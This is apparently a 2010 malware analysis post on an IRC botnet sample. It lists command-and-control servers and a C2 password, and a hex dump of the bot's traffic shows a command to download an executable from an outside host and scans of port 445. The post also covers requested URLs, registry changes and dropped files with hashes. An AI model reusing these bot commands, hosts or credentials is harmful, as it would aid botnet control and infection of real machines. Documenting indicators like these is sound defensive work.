ms4all.twoplayers.net

By Pig, October 19, 2010

Remote Host Port Number
112.78.112.208 80
195.2.252.21 80
204.45.118.250 80
204.45.121.50 80
218.85.133.201 80
123.0.41.218 3128
24.63.206.135 3128
62.103.174.192 3128
82.38.141.57 3128
204.45.85.218 57221 PASS laorosr
209.90.137.223 1199

USER SP2-743 * 0 :COMPUTERNAME
MODE #! -ix
MODE #Ma -ix
MODE [N00_USA_XP_7728388]
@ -ix
MODE #dpi -ix

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 2369 203A 4854 5450 2053 | RVMSG #i :HTTP S
00000020 | 4554 2068 7474 703A 2F2F 3230 382E 3533 | ET http://208.53
00000030 | 2E31 3833 2E31 3831 2F62 2E65 7865 0D0A | .183.181/b.exe..
00000040 | 4E43 494B 205B 4E30 305F 5553 415F 5850 | NCIK [N00_USA_XP
00000050 | 5F37 3732 3833 3838 5D18 E740 0D0A 5052 | _7728388]..@..PR
00000060 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000070 | 505F 3737 3238 BCB9 4020 3A73 6361 6E2F | P_7728..@ :scan/
00000080 | 2F20 5472 7969 6E67 2074 6F20 6765 7420 | / Trying to get
00000090 | 6578 7465 726E 616C 2049 502E 0D0A 5052 | external IP…PR
000000A0 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
000000B0 | 505F 3737 3238 BCB9 4020 3A73 6361 6E2F | P_7728..@ :scan/
000000C0 | 2F20 5261 6E64 6F6D 2050 6F72 7420 5363 | / Random Port Sc
000000D0 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
000000E0 | 322E 782E 782E 783A 3434 3520 7769 7468 | 2.x.x.x:445 with
000000F0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
00000100 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
00000110 | 7465 7320 7573 696E 6720 3235 2074 6872 | tes using 25 thr
00000120 | 6561 6473 2E0D 0A50 5252 564D 5347 205B | eads…PRRVMSG [
00000130 | 4E30 305F 5553 415F 5850 5F37 3732 38BC | N00_USA_XP_7728.
00000140 | B940 203A 7363 616E 2F2F 2054 7279 696E | .@ :scan// Tryin
00000150 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
00000160 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP…PRRVMSG [
00000170 | 4E30 305F 5553 415F 5850 5F37 3732 38BC | N00_USA_XP_7728.
00000180 | B940 203A 7363 616E 2F2F 2052 616E 646F | .@ :scan// Rando
00000190 | 6D20 506F 7274 2053 6361 6E20 7374 6172 | m Port Scan star
000001A0 | 7465 6420 6F6E 2031 3932 2E31 3638 2E78 | ted on 192.168.x
000001B0 | 2E78 3A34 3435 2077 6974 6820 6120 6465 | .x:445 with a de
000001C0 | 6C61 7920 6F66 2035 2073 6563 6F6E 6473 | lay of 5 seconds
000001D0 | 2066 6F72 2030 206D 696E 7574 6573 2075 | for 0 minutes u
000001E0 | 7369 6E67 2032 3520 7468 7265 6164 732E | sing 25 threads.
000001F0 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
00000200 | 5341 5F58 505F 3737 3238 BCB9 4020 3A73 | SA_XP_7728..@ :s
00000210 | 6361 6E2F 2F20 5365 7175 656E 7469 616C | can// Sequential
00000220 | 2050 6F72 7420 5363 616E 2073 7461 7274 | Port Scan start
00000230 | 6564 206F 6E20 3139 322E 3136 382E 302E | ed on 192.168.0.
00000240 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000250 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000260 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000270 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000280 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000290 | 415F 5850 5F37 3732 38BC B940 203A 7363 | A_XP_7728..@ :sc
000002A0 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
000002B0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
000002C0 | 6420 6F6E 2031 3932 2E31 3638 2E38 302E | d on 192.168.80.
000002D0 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
000002E0 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
000002F0 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000300 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000310 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000320 | 415F 5850 5F37 3732 38BC B940 203A 7363 | A_XP_7728..@ :sc
00000330 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
00000340 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000350 | 6420 6F6E 2031 3932 2E30 2E30 2E30 3A34 | d on 192.0.0.0:4
00000360 | 3435 2077 6974 6820 6120 6465 6C61 7920 | 45 with a delay
00000370 | 6F66 2035 2073 6563 6F6E 6473 2066 6F72 | of 5 seconds for
00000380 | 2030 206D 696E 7574 6573 2075 7369 6E67 | 0 minutes using
00000390 | 2031 3020 7468 7265 6164 732E 0D0A 7365 | 10 threads…se
000003A0 | 6E64 2023 212C 234D 6120 6F6F 6F6F 0D0A | nd #!,#Ma oooo..

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://123.0.41.218/+17253.html
o http://cefaery.com/dwmucwryg/eidksa.php?adv=adv600
o http://cefaery.com/dwmucwryg/qhlwelge.php?adv=adv600
o http://cefaery.com/dwmucwryg/ulcnhpaip.php?adv=adv600&code1=KNM0&code2=4104&id=13441600&p=1
o http://cefaery.com/dwmucwryg/xofmysnlgn.php?id=13441600&p=1
o http://cefaery.com/dwmucwryg/xofnlsa.php?adv=adv600
o http://204.45.118.250/__ex
o http://204.45.118.250/__ld
o http://204.45.121.50/mybackup21.rar
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://24.63.206.135/+17253.html
o http://62.103.174.192/+17253.html
o http://82.38.141.57/+17253.html

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_ASYNCMAC
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_ASYNCMAC000
o HKEY_LOCAL_MACHINESYSTEMControlSet002EnumRootLEGACY_ASYNCMAC
o HKEY_LOCAL_MACHINESYSTEMControlSet002EnumRootLEGACY_ASYNCMAC000

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_ASYNCMAC000]
+ Service = “AsyncMac”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “RAS Asynchronous Media Driver”
+ Capabilities = 0x00000000
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_ASYNCMAC]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet002EnumRootLEGACY_ASYNCMAC000]
+ Service = “AsyncMac”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “RAS Asynchronous Media Driver”
+ Capabilities = 0x00000000
o [HKEY_LOCAL_MACHINESYSTEMControlSet002EnumRootLEGACY_ASYNCMAC]
+ NextInstance = 0x00000001

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %CommonAppData%MicrosoftCryptoRSAS-1-5-186d14e4b1d8ca773bab785d1be032546e_a7bcc1a4-f7a4-4502-8650-8579e607f7f7 47 bytes MD5: 0x64BC6B0E1D907AE8ACF27BDB155344C2
SHA-1: 0x7AA0D9AF2D61D73A044F288E16FDD07813C972BA (not available)
2 %AppData%ohydy.exe
[file and pathname of the sample #1] 82 944 bytes MD5: 0xDB6785A8DFAB9EEFFD87A2D1AC4C1825
SHA-1: 0x973B4CDEA43A8CFD1540B4248D7366D70E9582EB Worm.Win32.AutoRun.bntt [Kaspersky Lab]
Troj/Pincav-I [Sophos]
Trojan:Win32/Rimecud.A [Microsoft]
3 %Temp%1138.exe
%Windir%cfdrive32.exe 86 016 bytes MD5: 0x5CCE5D43CD187C397FEAA68019FDA0D3
SHA-1: 0x5FB0F83189196F412FEE82820117FC3CE09654EA (not available)
4 %Temp%36053.exe
c:RECYCLERS-1-5-21-0243936033-3052116371-381863308-1811vsbntlo.exe 69 632 bytes MD5: 0x6F1229CF9564C74389D3231E72990928
SHA-1: 0x6BA0ED0E792E19A3D9DBB5FC9847FB2E6BE3FE07 Trojan:Win32/Meredrop [Microsoft]
5 %Temp%6219578.exe
c:lsass.exe 25 088 bytes MD5: 0x00E1EF60617FA28C0FF5E83274FA0C03
SHA-1: 0x4422D228A354ECFF0FC80DBC0D9CBF674AB671C6 Suspicious.MH690 [Symantec]
Mal/Zlob-AG [Sophos]
Trojan-Downloader.Agent [Ikarus]
Win-Trojan/Cson3.Gen [AhnLab]
packed with UPX [Kaspersky Lab]
6 %Temp%629.exe 2 172 bytes MD5: 0x2DB236EC4F6C85C93F3F2089B3EE31E7
SHA-1: 0x5BA48A4A2FBED436DA83CB201CC6F3F8DD091404 (not available)
7 %Temp%998935.exe 2 162 bytes MD5: 0x2E174D69715E40C41274F776438F479F
SHA-1: 0x91373F9DBF5E327BF2D27D886B4B20E104C2410B (not available)
8 %Temp%ftvslix.exe 21 504 bytes MD5: 0x2F50AFAFB174303A56E1B4F6E4C6192D
SHA-1: 0xAA0ED5E78AB4E9B78D9CD5E2543028F5B3A5F5B5 Trojan:Win32/Meredrop [Microsoft]
9 c:RECYCLERS-1-5-21-0243936033-3052116371-381863308-1811Desktop.ini 63 bytes MD5: 0xE783BDD20A976EAEAAE1FF4624487420
SHA-1: 0xC2A44FAB9DF00B3E11582546B16612333C2F9286 (not available)
10 %System%driversasyncmac.sys.bak 14 336 bytes MD5: 0x02000ABF34AF4C218C35D257024807D6
SHA-1: 0x4BD208ABCAB95B6E14E966EAB395BCDE461B839E packed with PE_Patch [Kaspersky Lab]
11 %System%driversatmarpc.sys.bak 59 904 bytes MD5: 0xEC88DA854AB7D7752EC8BE11A741BB7F
SHA-1: 0x6DF1AA383BA018086A5B15E551003995A44D7696 packed with PE_Patch [Kaspersky Lab]

Categories: Uncategorized